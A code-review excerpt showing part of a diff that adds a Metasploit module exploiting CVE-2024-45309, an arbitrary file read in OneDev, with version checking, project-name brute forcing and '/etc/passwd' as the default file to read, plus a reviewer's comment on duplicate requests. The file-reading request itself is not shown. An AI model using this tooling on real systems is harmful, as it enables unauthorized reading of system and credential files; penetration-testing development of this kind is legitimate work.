modules/auxiliary/gather/onedev_arbitrary_file_read.rb

```diff
@@ -0,0 +1,130 @@
+          By providing a user-supplied wordlist, the module may be able to guess a valid project name and subsequently exploit the vulnerability.
+        },
+        'Author' => [
+          'vultza', # metasploit module
+          'Siebene' # vuln discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-45309'],
+          ['URL', 'https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489']
+        ],
+        'DisclosureDate' => '2024-10-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The relative URI of the OneDev instance', '/']),
+        OptString.new('TARGETFILE', [true, 'The absolute file path to read', '/etc/passwd']),
+        OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false]),
+        OptString.new('PROJECT_NAME', [true, 'The target OneDev project name', '']),
+        OptPath.new('PROJECT_NAMES_FILE', [
+                      false, 'File containing project names to try, one per line',
+                      File.join(Msf::Config.data_directory, 'wordlists', 'namelist.txt')
+                    ])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    return CheckCode::Unknown('Request failed') unless res
+
+    version = res.body.scan(/OneDev ([\d.]+)/).first
+
+    if version.nil?
+      return CheckCode::Unknown("Unable to detect the OneDev version, as the instance does not have anonymous access enabled.")
+    end
+
+    version = Rex::Version.new(version[0])
+
+    return CheckCode::Safe("OneDev #{version} is not vulnerable.") if version > Rex::Version.new('11.0.8')
+
+    CheckCode::Vulnerable("OneDev #{version} is vulnerable.")
+  end
+
+  def validate_project_exists(project)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, project, '~site')
+    })
+
+    fail_with(Failure::Unreachable, 'Request timed out.') unless res
+
+    return true unless res.code != 200
+
+    nil
+  end
+
+  def find_project
+    print_status 'Brute forcing valid project name ...'
+
+    File.open(datastore['PROJECT_NAMES_FILE'], 'rb').each do |project|
+      project = project.strip
+      next unless validate_project_exists(project)
+
+      print_status("#{peer} - Found valid OneDev project name: #{project}")
+      return project
+    end
+    nil
+  end
+
+  def run
+    project_name = datastore['PROJECT_NAME']
+
+    project_name = find_project if project_name.strip.empty?
+
+    fail_with(Failure::NoTarget, 'No valid OneDev project was found.') unless project_name
+
+    fail_with(Failure::NoTarget, 'Provided project name is invalid.') unless validate_project_exists(project_name)
```

Comment:
This will validate twice that the project is valid. It's not super-duper-critical, but it would be nice to minimize the amount of requests :)